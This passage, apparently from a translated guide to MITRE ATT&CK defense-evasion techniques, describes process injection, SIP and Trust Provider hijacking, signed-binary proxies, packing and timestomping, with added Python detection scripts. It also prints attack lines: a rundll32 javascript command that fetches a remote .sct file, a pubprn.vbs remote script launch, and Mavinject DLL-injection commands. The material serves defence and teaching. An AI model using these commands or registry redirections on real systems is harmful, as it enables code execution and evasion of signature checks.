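    The API-call analysis recommended above, as an added example that is not part of the original article or of MITRE ATT&CK: it walks a per-process call trace and reports processes that reach the ordered transaction, transacted-file, section, rollback, process-creation chain. The sensor's line format and the trace are constructed; NtCreateSection is included on the assumption that the sensor records the image section being created from the transacted file.

```python
"""Detect the Process Doppelganging API sequence in a per-process trace.

Added example for this article (not from the original post or MITRE).
It assumes an API-monitoring sensor emits one line per call as
"<pid> <api> [argument]"; the trace below is constructed. The ordered
chain checked here follows the four steps described above; NtCreateSection
(mapping the transacted file as an image) is added on the assumption
that the sensor records it between the write and the rollback.
"""
from collections import defaultdict

# Each stage must appear after the previous one for the same pid; other
# calls may be interleaved.
CHAIN = (
    "CreateTransaction",       # 1. transaction
    "CreateFileTransacted",    # 1. transacted handle to the target file
    "NtCreateSection",         # 2. image section from the modified file
    "RollbackTransaction",     # 3. disk copy restored
    "NtCreateProcessEx",       # 4. process "animated" from the section
)


def parse_trace(text):
    """Yield (pid, api, argument) from the sensor's line format."""
    for line in text.splitlines():
        parts = line.split(None, 2)
        if len(parts) >= 2:
            yield int(parts[0]), parts[1], (parts[2] if len(parts) > 2 else "")


def chain_progress(calls):
    """Return how many stages of CHAIN were reached in order (0..5)."""
    stage = 0
    for api in calls:
        if stage < len(CHAIN) and api == CHAIN[stage]:
            stage += 1
    return stage


def find_doppelganging(text):
    """Return {pid: (stage, verdict, target_file)} for non-trivial hits."""
    per_pid = defaultdict(list)
    targets = {}
    for pid, api, arg in parse_trace(text):
        per_pid[pid].append(api)
        if api == "CreateFileTransacted" and pid not in targets:
            targets[pid] = arg
    results = {}
    for pid, calls in per_pid.items():
        stage = chain_progress(calls)
        if stage == len(CHAIN):
            verdict = "doppelganging"
        elif stage >= 3:
            verdict = "suspicious: image section from transacted file"
        else:
            continue  # ordinary TxF use (committed or never mapped)
        results[pid] = (stage, verdict, targets.get(pid, ""))
    return results


# Constructed trace: pid 1001 runs the full chain against notepad.exe,
# pid 2002 is a legitimate transacted write that commits.
TRACE = """\
1001 CreateTransaction
1001 CreateFileTransacted C:\\Windows\\System32\\notepad.exe
1001 WriteFile
1001 NtCreateSection
1001 RollbackTransaction
1001 NtCreateProcessEx
1001 NtCreateThreadEx
2002 CreateTransaction
2002 CreateFileTransacted C:\\Users\\bob\\draft.txt
2002 WriteFile
2002 CommitTransaction
"""

if __name__ == "__main__":
    for pid, (stage, verdict, target) in find_doppelganging(TRACE).items():
        print(pid, f"{stage}/{len(CHAIN)}", verdict, target)
```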

    Process Hollowing

    System: Windows
    Rights: User
    Description: The attack is carried out by replacing the executable image of a process while the process is suspended. It is one of the ten process injection techniques.

    Security Tips: Preventive security measures in the form of blocking some API calls are likely to have negative side effects. The protection vector should be aimed at preventing the launch of the attacker's tools at an earlier stage in the attack chain. Process Hollowing can be used to bypass protection, but it is still good practice to block potentially dangerous applications and restrict software being used with whitelisting.

    Code injection into process (Process Injection), Ten Process Injection Techniques

    System: Windows, Linux, macOS
    Permissions: User, Administrator, system, root
    Description: Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process gives access to the memory of the injected process, to system / network resources, and possibly to elevated privileges. Process injection can also be used to avoid detection of malicious activity by security tools. Process injection techniques are based on abusing the various mechanisms that provide multithreading in the OS. Some approaches to injecting code into a process follow.

    • DLL injection. Performed by writing the path to a malicious DLL inside the process and then executing it by creating a remote thread (a remote thread is a thread that runs in the virtual address space of another process). In other words, the malware writes the DLL to disk and then uses a function such as CreateRemoteThread, which calls the LoadLibrary function in the injected process.
    • PE injection (Portable executable injection) abuses the way PE files, such as a DLL or EXE, are executed in memory. Malicious code is written into the process without writing any files to disk, and then its execution is triggered using additional code or by creating a remote thread.
    • Thread execution hijacking injects malicious code or a path to a DLL directly into a thread of the process. As with the Process Hollowing technique, the thread must first be suspended.
    • Asynchronous Procedure Call (APC) injection attaches malicious code to the APC queue of a process thread. One APC injection method, called "Early Bird injection", creates a suspended process in which malicious code can be written and launched at the process entry point via APC. AtomBombing is another injection variant that uses APC to invoke malicious code previously written to the global atom table.
    • Thread Local Storage (TLS) injection manipulates memory pointers inside the executable PE file to redirect the process to the malicious code.

    Mac and Linux
    • The environment variables LD_PRELOAD, LD_LIBRARY_PATH (Linux), DYLD_INSERT_LIBRARIES (macOS) or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) into a process, which in turn can be used to intercept API calls from running processes.
    • The ptrace system call can be used to attach to a running process and modify it while it is running.
    • /proc/[pid]/mem provides access to the process memory and can be used to read / write arbitrary data, but this method is rarely used because of the complexity of its implementation.
    • VDSO hijacking (Virtual Dynamic Shared Object) allows code to be injected during the execution of ELF binaries by manipulating code stubs from linux-vdso.so.
    Malicious programs typically use process injection to access system resources, through which an attacker can gain a foothold in the system and make other changes in the attacked environment. More sophisticated samples may perform multiple process injections to make their detection more difficult.

    Protection recommendations: Process injection techniques are based on the abuse of regular OS functions, and directly interfering with them can destabilize legitimate software and security products. Efforts to prevent injection techniques should focus on earlier stages of the attack chain. Use tools to block potentially dangerous software, such as AppLocker. Use Yama as a preventive measure against ptrace-based code injection, restricting the use of ptrace to privileged users only. Additional security measures may include deploying kernel security modules that provide advanced access control and process restriction, such as SELinux, grsecurity and AppArmor.
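    An added example (not code from the article or from MITRE) for the Linux side of the list above: it audits one process the way a responder would from /proc, looking for the LD_PRELOAD-family variables in its environment and for executable mappings from writable directories or deleted files, and checks that the Yama ptrace_scope recommended above is restricted. The /proc snapshots and the list of suspicious directories are constructed assumptions.

```python
"""Audit a Linux process for injected shared objects and check Yama.

Added example for this article (not from the original post or MITRE).
It reads the same data a responder would pull from /proc/[pid]/maps,
/proc/[pid]/environ and /proc/sys/kernel/yama/ptrace_scope; the inputs
below are constructed so the check runs offline. The directories
treated as suspicious are an assumption to adjust per host.
"""
# Writable or user-controlled locations from which a legitimate service
# should not be executing mapped code.
SUSPICIOUS_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/", "/home/")
PRELOAD_VARS = ("LD_PRELOAD", "LD_LIBRARY_PATH", "DYLD_INSERT_LIBRARIES")


def parse_maps(text):
    """Yield (perms, path) for every mapping that is backed by a path."""
    for line in text.splitlines():
        fields = line.split(None, 5)  # addr perms offset dev inode [path]
        if len(fields) == 6:
            yield fields[1], fields[5]


def parse_environ(raw):
    """Turn the NUL-separated /proc/[pid]/environ bytes into a dict."""
    env = {}
    for item in raw.split(b"\0"):
        if b"=" in item:
            key, _, value = item.partition(b"=")
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


def audit_process(maps_text, environ_raw):
    """Return a list of findings for one process."""
    findings = []
    env = parse_environ(environ_raw)
    for var in PRELOAD_VARS:
        if var in env:
            findings.append(f"{var} set in process environment: {env[var]}")
    seen = set()
    for perms, path in parse_maps(maps_text):
        if "x" not in perms or not path.startswith("/") or path in seen:
            continue  # only executable, file-backed mappings, once each
        seen.add(path)
        if path.endswith(" (deleted)"):
            findings.append(f"executable mapping of deleted file: {path}")
        elif path.startswith(SUSPICIOUS_DIRS):
            findings.append(f"executable mapping from writable dir: {path}")
    return findings


def ptrace_scope_restricted(scope_text):
    """True if Yama ptrace_scope is at least 1 (restricted ptrace)."""
    return int(scope_text.strip()) >= 1


# Constructed /proc snapshots (not taken from a real system).
MAPS = """\
55d0c0a00000-55d0c0a20000 r-xp 00000000 08:01 1234 /usr/sbin/sshd
7f1e1c000000-7f1e1c1c0000 r-xp 00000000 08:01 5678 /usr/lib/x86_64-linux-gnu/libc.so.6
7f1e1c1c0000-7f1e1c1d0000 r--p 001c0000 08:01 5678 /usr/lib/x86_64-linux-gnu/libc.so.6
7f1e1d000000-7f1e1d010000 r-xp 00000000 08:01 9999 /tmp/.x/libhook.so
7f1e1e000000-7f1e1e005000 r-xp 00000000 00:1a 4242 /dev/shm/payload.so (deleted)
7ffd30000000-7ffd30002000 r-xp 00000000 00:00 0 [vdso]
"""
ENVIRON = b"PATH=/usr/bin:/bin\0LD_PRELOAD=/tmp/.x/libhook.so\0HOME=/root\0"

if __name__ == "__main__":
    for finding in audit_process(MAPS, ENVIRON):
        print(finding)
    print("ptrace restricted:", ptrace_scope_restricted("1\n"))
```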

    Redundant Access

    System: Windows, Linux, macOS
    Permissions: User, Administrator, System
    Description: Attackers can simultaneously use several remote access tools with different control protocols in order to spread the risk of detection. Thus, if one of the remote access tools is detected and blocked but the defending party has not identified all of the attacker's tools, remote access to the attacked network is preserved. Attackers may also attempt to gain access to valid accounts of remote corporate services, such as VPN, in order to obtain alternative access to the system if the main remote access tools are blocked. Using a web shell is another method of remote access to the network through a web server.

    Protection recommendations: Monitor for and block the launch of known remote access tools on your network (Ammyy Admin, Radmin, RemotePC, VNC, etc.), use application launch control tools and block potentially dangerous software. Deploying IDS and IPS systems that identify specific malicious programs by signatures will reduce the likelihood of a successful attack, but over time attackers will modify their tools to change the signature and thereby bypass IDS and IPS.

    Regsvcs / Regasm

    System: Windows
    Permissions: User, Administrator
    Description: Regsvcs and Regasm are Windows utilities used to register .NET Component Object Model (COM) assemblies. Both files are digitally signed by Microsoft. Attackers can use Regsvcs and Regasm to proxy code execution when the code that must be run before registration or unregistration is specified with the attribute [ComRegisterFunction] or [ComUnregisterFunction]. Code with such attributes can run even if the process is executed with insufficient privileges or even "crashes" at startup.

    Security Tips : Block Regsvcs.exe and Regasm.exe if they are not used on your system or network.


    Rootkit

    System: Windows, Linux, macOS
    Permissions: Administrator, System, root
    Description: Rootkits are programs that hide the presence of malware by intercepting and modifying API calls. Rootkits can operate at the user level, in the OS kernel, or even lower, at the hypervisor, MBR or system firmware level. Adversaries use rootkits to hide the presence of programs, files, network connections, drivers, and other OS components.

    Protection recommendations: Identify and block potentially dangerous software that may contain rootkits using software whitelisting tools, anti-virus tools, or built-in OS protection.

    Rundll32 (Poweliks)

    System: Windows
    Permissions: User
    Description: Rundll32.exe is a system utility for running programs in dynamic link libraries. It can be called to proxy execution of a binary, and it executes Control Panel files (.cpl) through the undocumented functions Control_RunDLL and Control_RunDLLAsUser of shell32.dll. Double-clicking a .cpl file also causes Rundll32.exe to execute. Rundll32 can also be used to execute scripts such as JavaScript:

    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")

    The above method of using rundll32.exe is detected by antivirus software as the Poweliks virus.

    Protection Tips: Attack Surface Reduction (ASR) in EMET and Advanced Threat Protection in Windows Defender can block the use of Rundll32.exe to bypass whitelisting.

    SIP and Trust Provider Capture (SIP and Trust Provider Hijacking) or Subverting Trust in Windows

    System: Windows
    Privileges: Administrator, System
    Description: Attackers can modify the components of the Windows code signing and signature verification architecture in order to bypass launch control tools that allow only signed code to run. For creating, signing and verifying signatures of files of various formats, Windows uses the so-called Subject Interface Package (SIP): software specifications, unique to each file type, that mediate between the API functions that initiate the creation, calculation and verification of signatures and the files themselves. The validity of a signature is confirmed by so-called Trust Providers, OS software components that implement the various procedures related to calculating and verifying digital signatures.

    Popular attack methods:
    • Modification of the DLL and FuncName values in the key CryptSIPDllGetSignedDataMsg:
      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\[SIP_GUID]
      This is done to replace the DLL that provides the CryptSIPDllGetSignedDataMsg function, which returns the encoded digital certificate from a signed file. Using a modified SIP, a dummy function can always return a previously known valid signature value (for example, a Microsoft signature for system executables). The attacker may try to apply one valid signature to all files, but this will most likely result in the signature being invalid, because the hash returned by the function will not match the hash calculated from the file.
    • Modification of the DLL and FuncName values in the key:
      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\[SIP_GUID]
      This is done to replace the DLL that provides the CryptSIPDllVerifyIndirectData function, which compares the hash calculated from the file with the hash specified in the digital signature and returns the verification result (True / False). Thus, an attacker can ensure successful verification of any file using a modified SIP. The above values can be redirected to a suitable function from an existing library, which eliminates the need to create a new DLL file on disk.
    • Modification of the DLL and FuncName values in the key:
      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\[Trust Provider GUID]
      This is done to replace the DLL that provides the FinalPolicy function of a certain Trust Provider, which decodes and analyzes the signature and makes the trust decision. As with CryptSIPDllVerifyIndirectData, the value of the above keys can be redirected to an already existing DLL.

    It is important to note that the described attack on the Windows trust mechanism can also be implemented using the DLL Search Order Hijacking technique.

    Security recommendations: Make sure that users of the protected system cannot change the registry keys related to the SIP and Trust Provider components. Consider removing unnecessary and obsolete SIPs. Use tools that block the loading of malicious DLLs, for example, AppLocker and Device Guard built into Windows.
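    A check for the three registry locations listed above, as an added example that is not part of the original article or of MITRE ATT&CK: it parses a .reg export of the SIP and Trust Provider keys and reports a Dll value pointing outside System32 (a replaced provider) or a Dll/FuncName pair that differs from a baseline (a redirection to an existing library). The export is constructed; the baseline entries for the PE SIP and the Authenticode trust provider are given as an assumption and should be re-captured from a clean reference build.

```python
"""Check SIP and Trust Provider registry entries against a baseline.

Added example for this article (not from the original post or MITRE).
It assumes the keys below were exported with "reg export" into .reg
text; the export here is constructed. The baseline lists what a clean
system shows for the PE SIP and the Authenticode trust provider; it is
an assumption and should be re-captured from your own reference build.
"""
import re

SIP_ROOT = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0"
TRUST_ROOT = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust"
PE_SIP_GUID = "{C689AAB8-8E78-11D0-8C47-00C04FC295EE}"
AUTHENTICODE_GUID = "{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}"
SYSTEM32 = "c:\\windows\\system32\\"  # assumes SystemRoot is C:\Windows

# key (lowercased) -> (Dll basename, FuncName) expected on a clean system.
BASELINE = {k.lower(): v for k, v in {
    SIP_ROOT + "\\CryptSIPDllGetSignedDataMsg\\" + PE_SIP_GUID:
        ("wintrust.dll", "CryptSIPGetSignedDataMsg"),
    SIP_ROOT + "\\CryptSIPDllVerifyIndirectData\\" + PE_SIP_GUID:
        ("wintrust.dll", "CryptSIPVerifyIndirectData"),
    TRUST_ROOT + "\\FinalPolicy\\" + AUTHENTICODE_GUID:
        ("wintrust.dll", "SoftpubAuthenticode"),
}.items()}

KEY_LINE = re.compile(r"^\[(.+)\]$")
VALUE_LINE = re.compile(r'^"([^"]+)"="(.*)"$')


def parse_reg(text):
    """Parse .reg text into {key_path: {value_name: string_value}}."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_LINE.match(line)
        if m:
            current = m.group(1)
            keys[current] = {}
            continue
        m = VALUE_LINE.match(line)
        if m and current is not None:
            # .reg files double every backslash inside string values.
            keys[current][m.group(1)] = m.group(2).replace("\\\\", "\\")
    return keys


def audit_sip_keys(keys):
    """Return [(key, problem), ...] for SIP/Trust Provider keys that deviate."""
    findings = []
    for key, values in keys.items():
        if not key.lower().startswith((SIP_ROOT.lower(), TRUST_ROOT.lower())):
            continue
        dll = values.get("Dll", "")
        func = values.get("FuncName", "")
        base = dll.rsplit("\\", 1)[-1].lower()
        # A full path outside System32 means the provider DLL was replaced.
        if "\\" in dll and not dll.lower().startswith(SYSTEM32):
            findings.append((key, f"Dll outside System32: {dll}"))
        expected = BASELINE.get(key.lower())
        if expected and (base, func) != expected:
            findings.append((key, f"expected {expected[0]}!{expected[1]}, "
                                  f"found {base}!{func}"))
    return findings


# Constructed .reg export: one clean key, one replaced DLL, one redirect.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}]
"Dll"="C:\\Windows\\System32\\WINTRUST.DLL"
"FuncName"="CryptSIPGetSignedDataMsg"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}]
"Dll"="C:\\ProgramData\\sipfake.dll"
"FuncName"="AlwaysTrue"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}]
"Dll"="C:\\Windows\\System32\\ntdll.dll"
"FuncName"="ExampleExport"
"""

if __name__ == "__main__":
    for key, problem in audit_sip_keys(parse_reg(SAMPLE_REG)):
        print(problem, "\n   at", key)
```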


    Scripting

    System: Windows, Linux, macOS
    Permissions: User
    Description: Attackers can use scripts to automate their actions, speed up operational tasks and, as a result, reduce the time needed to gain access. Some scripting languages can be used to bypass process monitoring mechanisms by interacting directly with the OS at the API level instead of calling other programs. Scripts can be embedded in Office documents as macros and then used in a phishing attack. In this case the attackers count on the user launching the file with the macro, or agreeing to enable the macro. There are several popular scripting frameworks: Metasploit, Veil, PowerSploit.

    Security Tips: Restrict access to scripting engines such as VBScript or PowerShell. On Windows, configure MS Office security settings by enabling Protected View and disabling macros via GPO. If macros are needed, allow only digitally signed macros to run. Use microsegmentation and application virtualization, for example, Sandboxie on Windows and AppArmor or Docker on Linux.

    Proxy code execution through signed binaries (Signed Binary Proxy Execution)

    System: Windows
    Permissions: User
    Description: Binaries signed with trusted digital certificates can run on Windows systems protected by digital signature verification. Several Microsoft-signed files present by default on a Windows installation can be used to proxy the execution of other files:

    • Mavinject.exe is a Windows utility that allows you to execute code. Mavinject can be used to inject a DLL into a running process:
    "C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" [PID] /INJECTRUNNING [PATH DLL]
    C:\Windows\system32\mavinject.exe [PID] /INJECTRUNNING [PATH DLL]
    • SyncAppvPublishingServer.exe can be used to run PowerShell scripts without launching powershell.exe.
    There are several similar binaries.

    Security Tips: Many signed files may not be used on your system, so consider blocking their launch.

    Proxy code execution through signed scripts (Signed Script Proxy Execution)

    System: Windows
    Permissions: User
    Description: Scripts signed with trusted certificates can be used to proxy malicious files. For example, the PubPrn.vbs file is signed with a Microsoft certificate and can be used to launch a file from a remote server:
    cscript C:\Windows\System32\Printing_Admin_Scripts\ru-RU\pubprn.vbs script:http[:]//

    Security Recommendations: Such signed scripts may not be required on your system, therefore consider blocking their launch.

    Software Packing

    System: Windows
    Description: Software packing means that the adversary compresses or encrypts executable files, which changes the file's checksum and thus evades detection based on static signatures. Most unpacking methods decompress the executable code in memory. Examples of popular executable packers are MPRESS and UPX, but a whole host of other packers is known, and adversaries can also create their own packing methods that do not leave the artifacts of well-known packers. Packing of executables is not a definitive indicator of malware, as legitimate software developers may use packing to reduce distribution size or protect proprietary code.

    Protection recommendations: Update anti-virus tools, create custom signatures for malware detection, use heuristic detection methods. Identify and block potentially dangerous software.
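    A heuristic that complements signatures, as the recommendations above suggest, is to measure how random the bytes of a file look: compressed or encrypted code has a near-uniform byte distribution, so a high-entropy region in a file that is supposed to contain plain machine code is worth a look. The following is an added example of such a check (not code from the article or from MITRE); the entropy threshold of 7.2 bits per byte, the 4 KiB window and the UPX section-name markers are assumptions chosen for illustration, and the sample inputs are constructed in the code.

```python
import math
import os
from collections import Counter

# Section names UPX writes into a PE header. Treat as a hint only: an adversary
# can rename sections, and custom packers (as the text notes) leave no such marker.
KNOWN_PACKER_MARKERS = (b"UPX0", b"UPX1")


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a constant buffer, 8.0 for uniform random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def packer_markers(data: bytes) -> list:
    """Return the names of any well-known packer markers present in the file."""
    return [m.decode() for m in KNOWN_PACKER_MARKERS if m in data]


def looks_packed(data: bytes, threshold: float = 7.2, window: int = 4096) -> dict:
    """Slide a window over the file and report the highest-entropy window.

    A packed file still has a low-entropy loader stub and headers, so whole-file
    entropy is diluted; the maximum over windows exposes the packed payload.
    """
    max_ent = 0.0
    for off in range(0, max(1, len(data)), window):
        max_ent = max(max_ent, shannon_entropy(data[off:off + window]))
    markers = packer_markers(data)
    return {
        "max_window_entropy": round(max_ent, 3),
        "markers": markers,
        "suspicious": max_ent >= threshold or bool(markers),
    }


if __name__ == "__main__":
    # Constructed samples: repeated text stands in for an unpacked binary; a short
    # text stub followed by random bytes stands in for a packed one.
    plain = b"This is ordinary program text and data. " * 200
    packed = b"MZ stub with UPX0 UPX1 section names " + os.urandom(16384)
    print("plain :", looks_packed(plain))
    print("packed:", looks_packed(packed))
```

    In practice the check is run per PE section rather than per fixed window, and a high-entropy result is an indicator to correlate with other signals (unusual import tables, packer markers, behaviour at run time), not a verdict by itself.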

    Space after file name (Space after Filename)

    System: Linux, macOS
    Permissions: User
    Description: Attackers can hide the true file type by changing its extension. For certain file types (this does not work with .app bundles), adding a space character to the end of the file name changes how the operating system handles the file. For example, if there is a Mach-O executable called evil.bin, then when the user double-clicks it the OS launches it in Terminal.app and executes it. If the same file is renamed to evil.txt, a double-click opens it in a text editor. However, if the file is renamed to "evil.txt " (with a trailing space), the OS determines the true file type on double-click and runs the binary. Attackers can use this technique to trick a user into launching a malicious executable.

    Protection recommendations: This technique is difficult to prevent because the attacker uses regular operating system mechanisms, so protection should be aimed at stopping malicious actions at earlier stages of the attack, for example at delivery or when the malicious file is created on the system.
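    Since the file name itself carries the trick, a simple check at the delivery or endpoint-scanning stage is to flag names with trailing whitespace and, independently, to compare a file's claimed extension with the executable magic bytes at its start. The following is an added example of such a scan (not code from the article or from MITRE); the list of magic numbers, the set of "document" extensions and the demo directory are assumptions constructed for illustration.

```python
import os
import tempfile

# Leading bytes of native executables (assumption: illustrative, not exhaustive).
# Mach-O 32/64-bit as stored on little-endian hosts, fat binaries, ELF and PE.
EXECUTABLE_MAGICS = {
    b"\xce\xfa\xed\xfe": "Mach-O 32-bit",
    b"\xcf\xfa\xed\xfe": "Mach-O 64-bit",
    b"\xca\xfe\xba\xbe": "Mach-O fat (also Java class)",
    b"\x7fELF": "ELF",
    b"MZ": "PE/DOS",
}
# Extensions a user expects to open in a viewer, not an interpreter.
DOCUMENT_EXTENSIONS = {".txt", ".pdf", ".doc", ".docx", ".jpg", ".png"}


def executable_type(path):
    """Return the executable format name if the file starts with a known magic."""
    with open(path, "rb") as f:
        head = f.read(4)
    for magic, name in EXECUTABLE_MAGICS.items():
        if head.startswith(magic):
            return name
    return None


def inspect_file(path):
    """Findings for one file: trailing whitespace in the name, executable content
    behind a document extension."""
    findings = []
    name = os.path.basename(path)
    if name != name.rstrip():
        findings.append("trailing whitespace in file name")
    ext = os.path.splitext(name.rstrip())[1].lower()
    kind = executable_type(path)
    if kind and ext in DOCUMENT_EXTENSIONS:
        findings.append(f"{kind} content behind document extension {ext!r}")
    return findings


def scan_directory(root):
    """Map file name -> findings for every flagged file under root."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            findings = inspect_file(os.path.join(dirpath, fn))
            if findings:
                report[fn] = findings
    return report


def build_demo_dir():
    """Constructed sample: a text file, a plain Mach-O stub and the same stub
    disguised as 'evil.txt ' (trailing space). Returns the directory path."""
    root = tempfile.mkdtemp(prefix="spacename_")
    fake_macho = b"\xcf\xfa\xed\xfe" + b"\x00" * 32  # header only, not a real binary
    with open(os.path.join(root, "notes.txt"), "wb") as f:
        f.write(b"just text\n")
    with open(os.path.join(root, "evil.bin"), "wb") as f:
        f.write(fake_macho)
    with open(os.path.join(root, "evil.txt "), "wb") as f:
        f.write(fake_macho)
    return root


if __name__ == "__main__":
    for name, findings in scan_directory(build_demo_dir()).items():
        print(repr(name), "->", findings)
```

    The magic-byte comparison is the more robust half: a trailing space can be replaced by other Unicode whitespace, but the executable header cannot be hidden without breaking the binary.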

    Timestomp
    System: Windows, Linux
    Permissions: User, Administrator, System
    Description: Timestomping is the modification of a file's timestamps (modified, accessed, created). Timestomping is often used to disguise files that an attacker has modified or created so that they do not stand out to forensic analysts and forensic tools. It can be combined with file-name masquerading to hide the attacker's malware and tools.

    Protection recommendations: Aim protection at preventing the launch of potentially dangerous and malicious software. Forensic practice describes ways to detect timestamp modification by collecting information about file handle opens and comparing it with the timestamps stored in the file.
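    One inconsistency the forensic comparison above relies on can be checked directly on POSIX systems: a user can set a file's access and modification times with utime(), but the inode change time (ctime) is maintained by the kernel and is itself bumped by that call, so a "modified" time far older than the last inode change is a classic sign. The following is an added example (not code from the article or from MITRE) that backdates a constructed file the way a naive timestomp would and then applies that check; the one-day slack and the sub-second heuristic are assumptions, and the checks will not catch an attacker who also resets ctime via the system clock or raw disk writes.

```python
import os
import tempfile
import time

ONE_DAY = 86400


def timestamp_anomalies(path, slack=ONE_DAY):
    """Heuristic checks on the three POSIX timestamps of one file.

    Assumption: these are illustrative indicators, not proof of tampering.
    """
    st = os.stat(path)
    now = time.time()
    findings = []
    # utime() rewrites atime/mtime but the kernel sets ctime to "now", so a backdated
    # mtime that predates ctime by a wide margin is inconsistent with normal editing.
    if st.st_mtime < st.st_ctime - slack:
        findings.append("mtime predates ctime by more than slack: possible timestomp")
    if st.st_mtime > now + slack or st.st_atime > now + slack:
        findings.append("timestamp in the future")
    # Tools that set whole-second values leave a zero nanosecond part, while the
    # kernel-written ctime keeps full precision on filesystems that support it.
    if st.st_mtime_ns % 1_000_000_000 == 0 and st.st_ctime_ns % 1_000_000_000 != 0:
        findings.append("mtime has a zero sub-second part while ctime does not")
    return findings


def demo():
    """Constructed sample: one freshly written file, one backdated with utime()."""
    d = tempfile.mkdtemp(prefix="tstomp_")
    clean = os.path.join(d, "clean.log")
    stomped = os.path.join(d, "stomped.log")
    for p in (clean, stomped):
        with open(p, "w") as f:
            f.write("sample\n")
    # The step a timestomping tool performs: push atime and mtime back to 2015.
    old = time.mktime((2015, 3, 1, 12, 0, 0, 0, 0, -1))
    os.utime(stomped, (old, old))
    return {"clean": timestamp_anomalies(clean), "stomped": timestamp_anomalies(stomped)}


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, "->", findings or "no anomalies")
```

    On NTFS the equivalent comparison is between the $STANDARD_INFORMATION timestamps (user-writable) and the $FILE_NAME timestamps in the MFT record, which ordinary APIs do not change; the Python os.stat view does not expose the latter, so a Windows investigation needs an MFT parser for that part.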

    Trusted Developer Utilities

    System: Windows
    Permissions: User
    Description: There are many utilities used by software developers that can execute code in various forms during development, debugging and reverse engineering. These utilities are often signed with digital certificates, which lets them proxy malicious code execution in the OS, bypassing protection mechanisms and application whitelists.
    • MSBuild is the build platform used by Visual Studio. It uses projects in the form of XML files that describe the requirements for building for various platforms and configurations. Starting with .NET version 4, MSBuild allows C# code to be inserted into an XML project, compiled and then executed. MSBuild.exe is signed with a Microsoft digital certificate.
    • DNX, the .NET Execution Environment (dnx.exe), is a development kit for Visual Studio Enterprise. It was deprecated in favor of the .NET Core CLI in 2016. DNX is not available in standard Windows builds and can only be present on developer hosts that use .NET Core and ASP.NET Core 1.0. Dnx.exe is signed with a digital certificate and can be used to proxy code execution.
    • RCSI is a non-interactive command-line interface for C#, similar to csi.exe. It was introduced in an early version of the Roslyn .NET compiler platform. Rcsi.exe is signed with a Microsoft digital certificate. C# .csx script files can be written and executed using Rcsi.exe from the Windows command line.
    • WinDbg / CDB: WinDbg is the Microsoft Windows kernel-mode and user-mode debugger, and the Microsoft console debugger cdb.exe is also a user-mode debugger. Both can be used as standalone tools. They are usually used in software development and reverse engineering and are not normally found on ordinary Windows systems. Both WinDbg.exe and CDB.exe are signed with a Microsoft digital certificate and can be used to proxy code execution.
    • Tracker is the file tracking utility tracker.exe, included in .NET as part of MSBuild. It is used to log calls to the Windows 10 file system. Attackers can use tracker.exe to execute DLLs in various processes. Tracker.exe is also signed with a Microsoft certificate.

    Protection recommendations: All the above files are subject to removal from the system if they are not used for their intended purpose by users.

    Valid accounts

    Description: Attackers can steal the credentials of a specific user or service account using credential access techniques, or capture credentials during reconnaissance using social engineering. Compromised credentials can be used to bypass access control systems and gain access to remote systems and external services such as VPN, OWA or remote desktop, or to obtain elevated privileges on certain systems and network segments. If this scenario succeeds, attackers can forgo malware altogether, making their detection more difficult. Attackers can also create accounts with predefined names and passwords to keep backup access in case other means fail.

    Security Recommendations: Apply a password policy and follow the recommendations for designing and administering a corporate network so that the use of privileged accounts is limited at every administrative level. Regularly audit domain and local accounts and their rights to identify those that could give an attacker broad access. Monitor account activity with SIEM systems.

    Web Service

    System: Windows
    Rights: User
    Description: Attackers can use a running, legitimate external web service as a channel for sending commands to control an infected system. The management servers are called Command and Control (C&C or C2). Popular websites and social networks can act as a C2 mechanism, and various publicly accessible services such as Google or Twitter can be used as well. All this helps hide malicious activity in the general traffic flow. Web services typically use SSL/TLS, which gives adversaries an extra layer of cover.

    Protection recommendations: Firewalls and web proxies can be used to enforce external network communication policies. IDS/IPS systems using signature-based analysis can detect known malware at the network level. However, keep in mind that over time adversaries will change the signatures of their C2 tools or rework the protocols to avoid detection by commonly used protection tools. Using user behaviour monitoring tools can also increase the chance of detecting abnormal activity.

    Processing XSL Scripts (XSL Script Processing)

    System: Windows
    Permissions: User
    Description: Extensible Stylesheet Language (*.xsl) files are usually used to describe the processing and rendering of data in XML files. To support complex operations, XSL allows scripts in various languages to be embedded in the stylesheet. Malicious users may abuse this functionality to execute arbitrary files. Similarly to the abuse of trusted developer utilities (Trusted Developer Utilities), the trusted utility msxsl.exe, which converts an XML document into another form (html, wml, rtf, pdf, etc.), can be used to execute malicious JavaScript embedded in local or remote (specified via URL) XSL files. Since msxsl.exe is not installed by default, the adversary will most likely have to bring it along with the other necessary files. An example msxsl.exe invocation:
    msxsl.exe customers.xml script.xsl
